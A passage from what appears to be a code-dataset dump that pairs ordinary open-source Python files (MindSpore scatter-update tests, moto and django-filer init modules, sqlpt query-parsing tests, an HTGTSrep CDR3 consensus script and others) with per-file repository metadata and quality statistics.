self.scatter_update = P.ScatterUpdate(use_locking=lock)
self.inputx = Parameter(inputx, name="inputx")
self.indices = Parameter(indices, name="indices")
self.updates = Parameter(updates, name="updates")
def construct(self):
out = self.scatter_update(self.inputx, self.indices, self.updates)
return out
def scatter_update_net(inputx, indices, updates):
lock = True
net = TestScatterUpdateNet(lock, inputx, indices, updates)
return net()
def scatter_update_use_locking_false_net(inputx, indices, updates):
lock = False
net = TestScatterUpdateNet(lock, inputx, indices, updates)
return net()
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_update_input_updated():
inputx = Tensor(np.zeros((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
lock = True
net = TestScatterUpdateNet(lock, inputx, indices, updates)
net()
expected = np.array([[6., 7., 8.],
[9., 10., 11.]])
np.testing.assert_array_almost_equal(net.inputx.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_update_output_updated_float32():
inputx = Tensor(np.ones((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
output = scatter_update_net(inputx, indices, updates)
expected = np.array([[6., 7., 8.],
[9., 10., 11.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_update_small_float32_use_locking_false():
inputx = Tensor(np.ones((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
output = scatter_update_use_locking_false_net(inputx, indices, updates)
expected = np.array([[6., 7., 8.],
[9., 10., 11.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
| 39.757764
| 82
| 0.594712
| 3,366
| 25,604
| 4.374629
| 0.092395
| 0.046723
| 0.085569
| 0.028523
| 0.875314
| 0.874363
| 0.871986
| 0.860102
| 0.804822
| 0.791375
| 0
| 0.085047
| 0.238596
| 25,604
| 643
| 83
| 39.819596
| 0.670274
| 0.024918
| 0
| 0.676245
| 0
| 0
| 0.005883
| 0
| 0
| 0
| 0
| 0
| 0.05364
| 1
| 0.10728
| false
| 0
| 0.011494
| 0
| 0.172414
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fd5095688e3adf6f9ca25f40240ff9d7e4246e41
| 153
|
py
|
Python
|
moto/sts/__init__.py
|
pll/moto
|
e49e67aba5d108b03865bdb42124206ea7e572ea
|
[
"Apache-2.0"
] | null | null | null |
moto/sts/__init__.py
|
pll/moto
|
e49e67aba5d108b03865bdb42124206ea7e572ea
|
[
"Apache-2.0"
] | null | null | null |
moto/sts/__init__.py
|
pll/moto
|
e49e67aba5d108b03865bdb42124206ea7e572ea
|
[
"Apache-2.0"
] | null | null | null |
from .models import sts_backend
from ..core.models import base_decorator
sts_backends = {"global": sts_backend}
mock_sts = base_decorator(sts_backends)
| 25.5
| 40
| 0.810458
| 22
| 153
| 5.318182
| 0.5
| 0.205128
| 0.273504
| 0.410256
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104575
| 153
| 5
| 41
| 30.6
| 0.854015
| 0
| 0
| 0
| 0
| 0
| 0.039216
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
b5ba7ba10498502b304fe0e8be303cfbec8a9050
| 179
|
py
|
Python
|
tapiriik/web/views/dashboard.py
|
prohfesor/tapiriik
|
0c476f8bb6b3d51674f0117b054777405ff2ee0d
|
[
"Apache-2.0"
] | 1,445
|
2015-01-01T21:43:31.000Z
|
2022-03-17T13:40:23.000Z
|
tapiriik/web/views/dashboard.py
|
prohfesor/tapiriik
|
0c476f8bb6b3d51674f0117b054777405ff2ee0d
|
[
"Apache-2.0"
] | 441
|
2015-01-02T03:37:49.000Z
|
2022-03-31T18:18:03.000Z
|
tapiriik/web/views/dashboard.py
|
prohfesor/tapiriik
|
0c476f8bb6b3d51674f0117b054777405ff2ee0d
|
[
"Apache-2.0"
] | 333
|
2015-01-06T12:14:15.000Z
|
2022-03-27T19:58:48.000Z
|
from django.shortcuts import render
from django.views.decorators.csrf import ensure_csrf_cookie
@ensure_csrf_cookie
def dashboard(req):
return render(req, "dashboard.html")
| 22.375
| 59
| 0.810056
| 25
| 179
| 5.64
| 0.6
| 0.141844
| 0.22695
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111732
| 179
| 7
| 60
| 25.571429
| 0.886792
| 0
| 0
| 0
| 0
| 0
| 0.078212
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
b5bf153601a744508ecc99c7f24b1fb9627883ce
| 150
|
py
|
Python
|
exampleb.py
|
JFletcher94/tBot
|
051281c81b5712f7ecdb4355b7ea7f6551dec7c7
|
[
"MIT"
] | null | null | null |
exampleb.py
|
JFletcher94/tBot
|
051281c81b5712f7ecdb4355b7ea7f6551dec7c7
|
[
"MIT"
] | null | null | null |
exampleb.py
|
JFletcher94/tBot
|
051281c81b5712f7ecdb4355b7ea7f6551dec7c7
|
[
"MIT"
] | null | null | null |
#exampleb generates a full tweet
#examplet only calls get_string()
def get_string():
'''generate full tweet text'''
return 'example #text'
| 18.75
| 34
| 0.7
| 20
| 150
| 5.15
| 0.75
| 0.174757
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.193333
| 150
| 7
| 35
| 21.428571
| 0.85124
| 0.586667
| 0
| 0
| 1
| 0
| 0.236364
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
bd133f9bc78502bb6dd771b9750d4b772d62e105
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/jedi/inference/compiled/mixed.py
|
GiulianaPola/select_repeats
|
17a0d053d4f874e42cf654dd142168c2ec8fbd11
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/jedi/inference/compiled/mixed.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/jedi/inference/compiled/mixed.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/d9/2c/a4/7718a956dd946c833114214fec833728fef3062ae858a03a9d82cf9dc7
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.4375
| 0
| 96
| 1
| 96
| 96
| 0.458333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
bd4f4238a7747d65be7c026c2c3ecfe16032b5fb
| 104
|
py
|
Python
|
diofant/printing/pretty/__init__.py
|
project-kotinos/diofant___diofant
|
882549ac3a4dac238695aa620c02fce6ca33f9d3
|
[
"BSD-3-Clause"
] | 1
|
2021-08-22T09:34:15.000Z
|
2021-08-22T09:34:15.000Z
|
diofant/printing/pretty/__init__.py
|
project-kotinos/diofant___diofant
|
882549ac3a4dac238695aa620c02fce6ca33f9d3
|
[
"BSD-3-Clause"
] | null | null | null |
diofant/printing/pretty/__init__.py
|
project-kotinos/diofant___diofant
|
882549ac3a4dac238695aa620c02fce6ca33f9d3
|
[
"BSD-3-Clause"
] | null | null | null |
"""ASCII-ART 2D pretty-printer"""
from .pretty import pprint, pprint_use_unicode, pretty, pretty_print
| 26
| 68
| 0.778846
| 15
| 104
| 5.2
| 0.733333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010753
| 0.105769
| 104
| 3
| 69
| 34.666667
| 0.827957
| 0.259615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 6
|
1fb4d55d5bca1b790eead271507bcc6a81cff6e7
| 7,289
|
py
|
Python
|
tests/test_api.py
|
brycecaine/sqlpt
|
98b2d72d5f59f92e95a9172dfb0dab92018076f9
|
[
"MIT"
] | null | null | null |
tests/test_api.py
|
brycecaine/sqlpt
|
98b2d72d5f59f92e95a9172dfb0dab92018076f9
|
[
"MIT"
] | 3
|
2021-12-27T21:53:11.000Z
|
2021-12-27T21:53:11.000Z
|
tests/test_api.py
|
brycecaine/sqlpt
|
98b2d72d5f59f92e95a9172dfb0dab92018076f9
|
[
"MIT"
] | null | null | null |
import unittest
import sqlparse
from sqlparse import tokens as T
from sqlparse.sql import (Identifier,
Statement, Token,
TokenList)
from context import (
extract_from_clause, extract_where_clause, tokenize) # , fused)
from context import (
Query, Join, Table, FromClause, WhereClause, Field, Comparison)
class TestApi(unittest.TestCase):
def test_extract(self):
sql = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
whitespace = Token(T.Whitespace, ' ')
table_1 = Table('tbl_stu')
table_2 = Table('tbl_stu_crs')
token_1 = Token(T.Name, 'tbl_stu.id')
token_list_1 = TokenList([token_1])
field_1 = Identifier(token_list_1)
comparison_token = Token(T.Operator, '=')
comparison_list = TokenList([comparison_token])
comparison_1 = Identifier(comparison_list)
token_2 = Token(T.Name, 'tbl_stu_crs.stu_id')
token_list_2 = TokenList([token_2])
field_2 = Identifier(token_list_2)
join_comparison = Comparison(field_1, '=', field_2)
join_1 = Join(table_1, table_2, join_comparison)
joins = [join_1]
from_clause = FromClause(joins)
from_clause_expected = str(from_clause)
from_clause_actual = str(extract_from_clause(sql))
self.assertEqual(from_clause_actual, from_clause_expected)
def test_compare_sql(self):
sql_1 = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
sql_2 = ("select id, "
" name, "
" major "
" from tbl_stu_crs "
" join tbl_stu "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
from_clause_1 = extract_from_clause(sql_1)
from_clause_2 = extract_from_clause(sql_2)
where_clause_1 = extract_where_clause(sql_1)
where_clause_2 = extract_where_clause(sql_2)
self.assertEqual(from_clause_1, from_clause_2)
self.assertEqual(where_clause_1, where_clause_2)
def test_parse(self):
sql = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" join tbl_stu_crs_grd "
" on a = b "
" and c = d "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
sql_tokens = tokenize(sql)
# dir(sql_tokens[-1])
# sql_tokens[-1].tokens
class TestQuery(unittest.TestCase):
def test_extract(self):
sql = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
whitespace = Token(T.Whitespace, ' ')
table_1 = Table('tbl_stu')
table_2 = Table('tbl_stu_crs')
token_1 = Token(T.Name, 'tbl_stu.id')
token_list_1 = TokenList([token_1])
field_1 = Identifier(token_list_1)
comparison_token = Token(T.Operator, '=')
comparison_list = TokenList([comparison_token])
comparison_1 = Identifier(comparison_list)
token_2 = Token(T.Name, 'tbl_stu_crs.stu_id')
token_list_2 = TokenList([token_2])
field_2 = Identifier(token_list_2)
join_comparison = Comparison(field_1, '=', field_2)
join_1 = Join(table_1, table_2, join_comparison)
joins = [join_1]
from_clause = FromClause(joins)
from_clause_expected = str(from_clause)
query = Query(sql)
from_clause_actual = str(query.from_clause())
self.assertEqual(from_clause_actual, from_clause_expected)
def test_compare_sql(self):
sql_1 = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
sql_2 = ("select id, "
" name, "
" major "
" from tbl_stu_crs "
" join tbl_stu "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
query_1 = Query(sql_1)
query_2 = Query(sql_2)
from_clause_1 = query_1.from_clause()
from_clause_2 = query_2.from_clause()
where_clause_1 = query_1.where_clause()
where_clause_2 = query_2.where_clause()
self.assertEqual(from_clause_1, from_clause_2)
self.assertEqual(where_clause_1, where_clause_2)
def test_parse(self):
sql = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" join tbl_stu_crs_grd "
" on a = b "
" and c = d "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
query = Query(sql)
self.assertTrue(query)
# dir(sql_tokens[-1])
# sql_tokens[-1].tokens
def test_fuse(self):
sql_1 = ("select id, "
" name, "
" first_term "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2019-Fa' "
" and major = 'MAGC';")
sql_2 = ("select id, "
" name, "
" major "
" from tbl_stu_crs "
" join tbl_stu "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
sql_3 = ("select id, "
" name, "
" first_term, "
" major "
" from tbl_stu_crs "
" join tbl_stu "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where major = 'MAGC' "
" and enrl = 1 "
" and stu_sem = ':stu_sem';")
query_1 = Query(sql_1)
query_2 = Query(sql_2)
query_3 = Query(sql_3)
# query_4 = fused(query_1, query_2)
# self.assertEqual(query_4, query_3)
parameter_fields = ['stu_sem']
query_1.fuse(query_2).parameterize(parameter_fields)
self.assertEqual(query_1, query_3)
if __name__ == '__main__':
unittest.main()
| 30.755274
| 68
| 0.498697
| 840
| 7,289
| 3.971429
| 0.091667
| 0.097122
| 0.07554
| 0.046763
| 0.739508
| 0.726918
| 0.720923
| 0.720923
| 0.703537
| 0.701139
| 0
| 0.032704
| 0.404308
| 7,289
| 236
| 69
| 30.885593
| 0.735606
| 0.022088
| 0
| 0.786127
| 0
| 0
| 0.261657
| 0
| 0
| 0
| 0
| 0
| 0.046243
| 1
| 0.040462
| false
| 0
| 0.034682
| 0
| 0.086705
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
1fc6fa21c4051a53146d8cf76b830b672309eed5
| 12,203
|
py
|
Python
|
HTGTSrep/HTGTSrep/junctionsPerLibs.py
|
Yyx2626/HTGTSrep
|
d8716304b555a7b9161e5f2ce988ebfd17abc9f0
|
[
"MIT"
] | 2
|
2020-05-08T05:12:37.000Z
|
2022-03-28T02:53:03.000Z
|
HTGTSrep/HTGTSrep/junctionsPerLibs.py
|
Yyx2626/HTGTSrep
|
d8716304b555a7b9161e5f2ce988ebfd17abc9f0
|
[
"MIT"
] | 1
|
2020-03-05T04:08:39.000Z
|
2021-08-11T15:02:37.000Z
|
HTGTSrep/HTGTSrep/junctionsPerLibs.py
|
Yyx2626/HTGTSrep
|
d8716304b555a7b9161e5f2ce988ebfd17abc9f0
|
[
"MIT"
] | 4
|
2020-05-30T12:45:48.000Z
|
2022-03-31T12:24:53.000Z
|
'''import sys
import operator
from Bio.Seq import Seq
try:
from Bio.Alphabet import generic_dna, IUPAC
Bio_Alphabet = True
except ImportError:
Bio_Alphabet = None
# usages of generic_dna, IUPAC are not supported in Biopython 1.78 (September 2020).
print(f"The installed BioPython is a new version that has removed the Alphabet module.",file=sys.stderr)
def filter(statFile):
# statfile = '%s/allsample_clonal/allsample.mix_clone.stat.xls' % (args.outdir)
ListOfLines = []
labels = statFile.readline()
litems = labels[:-1].split("\t")
ListOfLines.append(litems)
for line in statFile:
items = line[:-1].split("\t")
ListOfLines.append(items)
return ListOfLines
def consensus(lines, CDR3_AA):
consensusLines = []
lines[0].append("CONSENSUS_SEQ")
jidx = lines[0].index("JUNC_DETAIL")
consensusLines.append(lines[0])
for line in lines[1:]:
# h = 1
# cdr = ''
juncDets = line[jidx]
# commented out useless lines JH 06032021
# for item in juncDets.split('|'):
# i1 = item.split(':')[0]
# i2 = int(item.split(':')[1])
# if i2 > h:
# h = i2
# cdr = i1
if CDR3_AA != "T":
consensus = get_consensus(juncDets)
else:
consensus = get_consensus_AA(juncDets)
line.append(consensus)
consensusLines.append(line)
return consensusLines
def get_consensus_AA(allCDR):
pos_base_num = {}
cdr3_len = len(allCDR.split('|')[0].split(':')[0])
for i in range(0, cdr3_len):
pos_base_num[i] = {"A": 0, "R": 0, "N": 0, "D": 0, "C": 0, "Q": 0, "E": 0, "G": 0, "H": 0, "I": 0, "L": 0, "K": 0, "M": 0, "F": 0, "P": 0, "S": 0, "T": 0, "W": 0, "Y": 0, "V": 0}
for seg in allCDR.split('|'):
j = seg.split(':')
for i in range(0, cdr3_len):
pos_base_num[i][j[0][i]] += int(j[1])
consensus = ''
for i in range(0, cdr3_len):
consensus += max(pos_base_num[i].items(), key=operator.itemgetter(1))[0]
return consensus
def get_consensus(allCDR):
pos_base_num = {}
cdr3_len = len(allCDR.split('|')[0].split(':')[0])
for i in range(0, cdr3_len):
pos_base_num[i] = {'A':0, 'T':0, 'C':0, 'G':0, "N":0}
for seg in allCDR.split('|'):
j = seg.split(':')
for i in range(0, cdr3_len):
pos_base_num[i][j[0][i]] += int(j[1])
consensus = ''
for i in range(0, cdr3_len):
consensus += max(pos_base_num[i].items(), key=operator.itemgetter(1))[0]
return consensus
def translate(listLines, CDR3_AA):
dnas = []
listLines[0].append("AA_SEQUENCE")
dnas.append(listLines[0])
conSeq = listLines[0].index("CONSENSUS_SEQ")
# i=0
if CDR3_AA != "T":
for line in listLines[1:]:
seq = line[conSeq]
while len(seq)%3 != 0:
seq += "N"
if Bio_Alphabet:
AA = Seq(seq, generic_dna).translate()
else:
AA = Seq(seq).translate()
# i+=1
line.append(str(AA))
dnas.append(line)
else:
for line in listLines[1:]:
seq = line[conSeq]
AA = seq
# i+=1
line.append(str(AA))
dnas.append(line)
return dnas
def main():
# statfile = '%s/allsample_clonal/allsample.mix_clone.stat.xls' % (args.outdir)
clonestat = open(sys.argv[1], "r")
CDR3_AA = sys.argv[2]
toParse = filter(clonestat)
toTranslate = consensus(toParse,CDR3_AA)
translated = translate(toTranslate,CDR3_AA) #already translated allsample.stat file, a list of lines in a file
libsfile = sys.argv[3:] #read in each library's clonestat file to create lib_detail
# # useless lines JH 06032021
# c=0
# libscloneDict = {} ##lib, clone: cdr3seq, num
# cdr3dict = {} ###seq, num : lib, clone
listOfSingleLibraryDicts = []
for library in libsfile:
libstatfile = open(library, "r")
libDict = {} ##append junction details to the library dictionary, for each clone (cdr3seq,V-allele, J-allele): sample, readnum
labels = libstatfile.readline()[:-1].split("\t")
juncIdx = labels.index("JUNC_DETAIL")
vidx = labels.index("V_ALLELE")
jidx = labels.index("J_ALLELE")
sIdx = labels.index("SAMPLE_DETAIL")
for line in libstatfile: #iterate through all the clones in a single library
items = line[:-1].split("\t")
v_allele = items[vidx]
j_allele = items[jidx]
juncDetails = items[juncIdx].split("|")
sample = items[sIdx]
for j in juncDetails:
seqSpecs = j.split(":")
cdr3seq = seqSpecs[0]
readNum = seqSpecs[1]
if (cdr3seq, v_allele, j_allele) not in libDict:
libDict[(cdr3seq, v_allele, j_allele)] = (sample, readNum)
#else:
# print(cdr3seq, readNum)
listOfSingleLibraryDicts.append(libDict)
# print(listOfSingleLibraryDicts)
translated[0].append("LIB_DETAIL") # will contain all lines of master clone file
labels = translated[0] # clonestat.readline()[:-1].split("\t")
idxJD = labels.index("JUNC_DETAIL")
# idxClone = labels.index("CLONE")
idxV = labels.index("V_ALLELE")
idxJ = labels.index("J_ALLELE")
for line in translated[1:2]: #clonestat:
v_allele = line[idxV]
j_allele = line[idxJ]
juncDetails = line[idxJD].split("|")
libDetailString = ''
for j in juncDetails:
seqSpecs = j.split(":")
cdr3seqJ = seqSpecs[0]
# readNum = seqSpecs[1]
tuple2check = (cdr3seqJ, v_allele, j_allele)
print(tuple2check,seqSpecs)
for dict in listOfSingleLibraryDicts:
if tuple2check in dict:
libDetailString += dict[tuple2check][0] + ":" + cdr3seqJ + ":" + dict[tuple2check][1] + "|"
print(libDetailString)
if libDetailString[-1] == "|":
line.append(libDetailString[:-1])
else:
line.append(libDetailString)
for i in translated:
print("\t".join(i))
main()
'''
import sys
import operator
from Bio.Seq import Seq
try:
from Bio.Alphabet import generic_dna, IUPAC
Bio_Alphabet = True
except ImportError:
Bio_Alphabet = None
# usages of generic_dna, IUPAC are not supported in Biopython 1.78 (September 2020).
print(f"The installed BioPython is a new version that has removed the Alphabet module.",file=sys.stderr)
def filter(statFile):
# statfile = '%s/allsample_clonal/allsample.mix_clone.stat.xls' % (args.outdir)
ListOfLines = []
labels = statFile.readline()
# updated to .replace so that the last character of the last line will not be accidentally deleted JH 06042021
# litems = labels[:-1].split("\t")
litems = labels.replace("\n", "").split("\t")
ListOfLines.append(litems)
for line in statFile:
# updated to .replace so that the last character of the last line will not be accidentally deleted JH 06042021
# items = line[:-1].split("\t")
items = line.replace("\n", "").split("\t")
ListOfLines.append(items)
return ListOfLines
def consensus(lines):
consensusLines = []
lines[0].append("CONSENSUS_SEQ")
jidx = lines[0].index("JUNC_DETAIL")
consensusLines.append(lines[0])
for line in lines[1:]:
# h = 1
# cdr = ''
juncDets = line[jidx]
# commented out useless lines JH 06032021
# for item in juncDets.split('|'):
# i1 = item.split(':')[0]
# i2 = int(item.split(':')[1])
# if i2 > h:
# h = i2
# cdr = i1
consensus = get_consensus(juncDets)
line.append(consensus)
consensusLines.append(line)
return consensusLines
def get_consensus(allCDR):
pos_base_num = {}
cdr3_len = len(allCDR.split('|')[0].split(':')[0])
for i in range(0, cdr3_len):
pos_base_num[i] = {'A':0, 'T':0, 'C':0, 'G':0, "N":0}
for seg in allCDR.split('|'):
j = seg.split(':')
for i in range(0, cdr3_len):
pos_base_num[i][j[0][i]] += int(j[1])
consensus = ''
for i in range(0, cdr3_len):
consensus += max(pos_base_num[i].items(), key=operator.itemgetter(1))[0]
return consensus
def translate(listLines):
dnas = []
listLines[0].append("AA_SEQUENCE")
dnas.append(listLines[0])
conSeq = listLines[0].index("CONSENSUS_SEQ")
# i=0
for line in listLines[1:]:
seq = line[conSeq]
while len(seq) % 3 != 0:
seq += "N"
if Bio_Alphabet:
AA = Seq(seq, generic_dna).translate()
else:
AA = Seq(seq).translate()
# i+=1
line.append(str(AA))
dnas.append(line)
return dnas
def main():
# NOTE statfile = '%s/allsample_clonal/allsample.mix_clone.stat.xls' % (args.outdir)
clonestat = open(sys.argv[1], "r")
toParse = filter(clonestat)
toTranslate = consensus(toParse)
translated = translate(toTranslate) #already translated allsample.stat file, a list of lines in a file
libsfile = sys.argv[2:] # read in each library's clonestat file to create lib_detail
# # useless lines JH 06032021
# c=0
# libscloneDict = {} ##lib, clone: cdr3seq, num
# cdr3dict = {} ###seq, num : lib, clone
listOfSingleLibraryDicts = []
for library in libsfile:
libstatfile = open(library, "r")
libDict = {} ##append junction details to the library dictionary, for each clone (cdr3seq,V-allele, J-allele): sample, readnum
# updated to .replace so that the last character of the last line will not be accidentally deleted JH 06042021
# labels = libstatfile.readline()[:-1].split("\t")
labels = libstatfile.readline().replace("\n", "").split("\t")
juncIdx = labels.index("JUNC_DETAIL")
vidx = labels.index("V_ALLELE")
jidx = labels.index("J_ALLELE")
sIdx = labels.index("SAMPLE_DETAIL")
for line in libstatfile: #iterate through all the clones in a single library
# updated to .replace so that the last character of the last line will not be accidentally deleted JH 06042021
# items = line[:-1].split("\t")
items = line.replace("\n", "").split("\t")
v_allele = items[vidx]
j_allele = items[jidx]
juncDetails = items[juncIdx].split("|")
sample = items[sIdx]
for j in juncDetails:
seqSpecs = j.split(":")
cdr3seq = seqSpecs[0]
readNum = seqSpecs[1]
if (cdr3seq, v_allele, j_allele) not in libDict:
libDict[(cdr3seq, v_allele, j_allele)] = (sample, readNum)
#else:
# print(cdr3seq, readNum)
listOfSingleLibraryDicts.append(libDict)
# print(listOfSingleLibraryDicts)
translated[0].append("LIB_DETAIL") # will contain all lines of master clone file
labels = translated[0] # clonestat.readline()[:-1].split("\t")
idxJD = labels.index("JUNC_DETAIL")
# idxClone = labels.index("CLONE")
idxV = labels.index("V_ALLELE")
idxJ = labels.index("J_ALLELE")
for line in translated[1:]: #clonestat:
v_allele = line[idxV]
j_allele = line[idxJ]
juncDetails = line[idxJD].split("|")
libDetailString = ''
for j in juncDetails:
seqSpecs = j.split(":")
cdr3seqJ = seqSpecs[0]
# readNum = seqSpecs[1]
tuple2check = (cdr3seqJ, v_allele, j_allele)
for dict in listOfSingleLibraryDicts:
if tuple2check in dict:
libDetailString += dict[tuple2check][0] + ":" + cdr3seqJ + ":" + dict[tuple2check][1] + "|"
if libDetailString[-1] == "|":
line.append(libDetailString[:-1])
else:
line.append(libDetailString)
for i in translated:
print("\t".join(i))
main()
| 35.891176
| 186
| 0.578137
| 1,509
| 12,203
| 4.597747
| 0.121272
| 0.016143
| 0.017296
| 0.014269
| 0.951427
| 0.943932
| 0.920294
| 0.920294
| 0.915682
| 0.902421
| 0
| 0.030324
| 0.283865
| 12,203
| 339
| 187
| 35.99705
| 0.763589
| 0.650414
| 0
| 0.1
| 0
| 0
| 0.057028
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.045455
| 0
| 0.127273
| 0.018182
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
1f406fa1d479f75e59d5f05a3c4ac549424cb9b7
| 214
|
py
|
Python
|
filer/models/__init__.py
|
pbs/django-filer
|
c862a84d4e1d86c14eeb509e341f6a7d39a421bf
|
[
"BSD-3-Clause"
] | 1
|
2015-03-03T15:49:14.000Z
|
2015-03-03T15:49:14.000Z
|
filer/models/__init__.py
|
pbs/django-filer
|
c862a84d4e1d86c14eeb509e341f6a7d39a421bf
|
[
"BSD-3-Clause"
] | 10
|
2015-04-08T14:16:52.000Z
|
2021-12-15T16:17:57.000Z
|
filer/models/__init__.py
|
pbs/django-filer
|
c862a84d4e1d86c14eeb509e341f6a7d39a421bf
|
[
"BSD-3-Clause"
] | null | null | null |
#-*- coding: utf-8 -*-
from .mixins import *
from .filemodels import *
from .clipboardmodels import *
from .imagemodels import *
from .foldermodels import *
from .virtualitems import *
from .archivemodels import *
| 23.777778
| 30
| 0.742991
| 24
| 214
| 6.625
| 0.5
| 0.377358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005495
| 0.149533
| 214
| 8
| 31
| 26.75
| 0.868132
| 0.098131
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
